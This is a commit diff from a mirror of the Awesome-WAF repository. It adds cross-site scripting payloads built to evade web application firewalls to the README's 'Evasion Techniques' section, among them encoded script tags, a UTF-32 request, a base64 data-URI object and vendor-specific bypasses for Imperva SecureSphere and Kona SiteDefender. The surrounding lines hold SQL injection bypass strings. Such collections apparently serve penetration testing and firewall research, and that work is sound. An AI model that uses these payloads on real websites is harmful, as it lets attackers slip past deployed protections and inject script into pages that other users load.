Awesome-Mirrors/Awesome-WAF
1
0
Fork 0
mirror of https://github.com/0xInfection/Awesome-WAF.git synced 2024-10-01 04:35:35 -04:00
Code Issues Packages Projects Releases Wiki Activity

Added more stuff

Browse Source
This commit is contained in:
0xInfection 2019-02-20 18:47:25 +05:30
parent ea9e7788dc
commit 6a7b4b0ad1
1 changed files with 23 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
README.md
View File

@ -1417,9 +1417,11 @@ Wanna detect WAFs? Lets see how.
</tr> </tr>
</table> </table>
## Evasion Techniques # Evasion Techniques
Lets look at some methods of bypassing and evading WAFs. Lets look at some methods of bypassing and evading WAFs.
## Cross Site Scripting:
### Fuzzing/Bruteforcing: ### Fuzzing/Bruteforcing:
#### Method: #### Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists: Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
@ -1447,7 +1449,7 @@ Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
#### Techniques: #### Techniques:
##### Keyword Filter Detection/Bypass ### Keyword Filter Detection/Bypass
__SQL Injection__ __SQL Injection__
@ -1512,7 +1514,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
__Scenario 2: Cross Site Scripting__ __Scenario 2: Cross Site Scripting__
##### Step 1:
- Normal deliberate test: - Normal deliberate test:
``` ```
<script>alert()</script> <script>alert()</script>
@ -1523,6 +1524,8 @@ __Scenario 2: Cross Site Scripting__
``` ```
- Bypassing firewall regex with new line (`\r\n`): - Bypassing firewall regex with new line (`\r\n`):
``` ```
<script>\r\nalert(1)</script>
<script> <script>
alert(1)</script> alert(1)</script>
``` ```
@ -1563,10 +1566,10 @@ script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert(1)"></script a=\u0
Example request: Example request:
<pre> <pre>
GET <b>/page.php?param=∀㸀㰀script㸀alert(1)㰀/script㸀</b> HTTP/1.1 GET <b>/page.php?p=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E</b> HTTP/1.1
Host: site.com Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
<b>Accept-Charset:utf-32, iso-8859-1;q=0.5</b> <b>Accept-Charset:utf-32; q=0.5</b>
Accept-Language: en-US,en;q=0.5 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate Accept-Encoding: gzip, deflate
</pre> </pre>
@ -1684,6 +1687,11 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
### __Imperva SecureSphere__ ### __Imperva SecureSphere__
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396) - [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
```
anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
```
- XSS Bypass by [@WAFNinja](https://waf.ninja) - XSS Bypass by [@WAFNinja](https://waf.ninja)
``` ```
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E %3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
@ -1693,6 +1701,10 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';> <iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'> <img/src=q onerror='new Function`al\ert\`1\``'>
``` ```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740) - SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
``` ```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having' 15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
@ -1892,6 +1904,12 @@ Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
``` ```
### __Kona SiteDefender__
- XSS Bypass by [@zseano](https://twitter.com/zseano)
```
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
## Awesome Tools ## Awesome Tools
### WAF Fingerprinting: ### WAF Fingerprinting:
__1. Fingerprinting with [NMap](https://nmap.org)__: __1. Fingerprinting with [NMap](https://nmap.org)__: